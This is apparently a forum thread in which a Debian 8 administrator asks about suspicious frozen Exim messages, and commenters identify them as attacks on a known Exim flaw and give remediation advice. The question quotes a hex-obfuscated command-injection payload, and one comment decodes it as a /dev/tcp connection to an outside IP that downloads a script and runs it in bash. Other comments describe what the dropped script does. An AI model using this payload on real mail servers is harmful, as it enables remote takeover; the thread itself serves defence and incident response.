# Exim frozen messages

Tags: exim

Recently, I began to receive similar frozen messages. I have a Debian GNU / Linux server 8.10 Exim version 4.84_2. Everyone reports that this version is not confirmed by attacks, however I get the following messages:

root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x31\x35\x2e\x35\x36\x2e\x31\x36\x31\x2f\x34\x34\x33\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost

I do not have in the system of suspicious processes and running cron jobs. What do you recommend to do in this case? I will be very grateful for valuable advice.

Can I upgrade exim to version 4.92 and how to do it on debian 8?

Comment: You should have already installed the security update! Stop reading this and do that now.

Comment: https://www.debian.org/security/2019/dsa-4456

Comment: But I'm already using the later version exim 4.84.2-2+deb8u5 for debian 8 jessie

Comment: Yes, it seems that this is flying under the radar of the jessie LTS support, and you are definitely being hit by the exploits. If you have a default Exim that does not relay messages, then you cannot somewhat alleviate the problem by restarting the service every 24 hours as the known exploit needs an open connection for several days. If you use it for relaying then it is an even bigger problem. You would have to empty the queues for held messages every day also.

Comment: Also inspect /root/.ssh for recently created keys as this seems a common automated attack drop.

Comment: This is the obfuscated command: "exec 5<>/dev/tcp/51.15.56.161/443;echo -e 'GET / HTTP/1.0\n' >&5;tail -n +11 <&5 | bash" &

Comment: Сhecked, no new suspicious keys

Comment: Unfortunately that doesn't mean you are in the clear. The script that is at the attack site does more things and can change anytime. In systemd it adds a cloud_agent service with a python program. It also starts some background processes, one of which kills any process using more than 30% cpu. But this is all open to change of course. There is also a script that will kill anything with http in the commandline.

Comment: It will also try to connect as root to every host it finds in a .ssh/known_hosts file of the system users.

Comment: systemctl status cloud_agent.service Unit cloud_agent.service could not be found How can I deal with these attempts?

Comment: Update or shut down preferably. Short of that it becomes very difficult. As I said if you only receive then with the known exploits and default settings it is still possible to protect yourself somewhat with restarting the service every day. Otherwise it becomes a lot harder, and new exploits may exist. This describes the known exploits: https://www.openwall.com/lists/oss-security/2019/06/06/1

Comment: How can i upgrade exim to 4.92 for debian jessie?

Comment: I see in the logs constantly "no IP address found for host scanner20.openportstats.com (during SMTP connection from [89.248.171.57])" This task is repeated every 3 hours.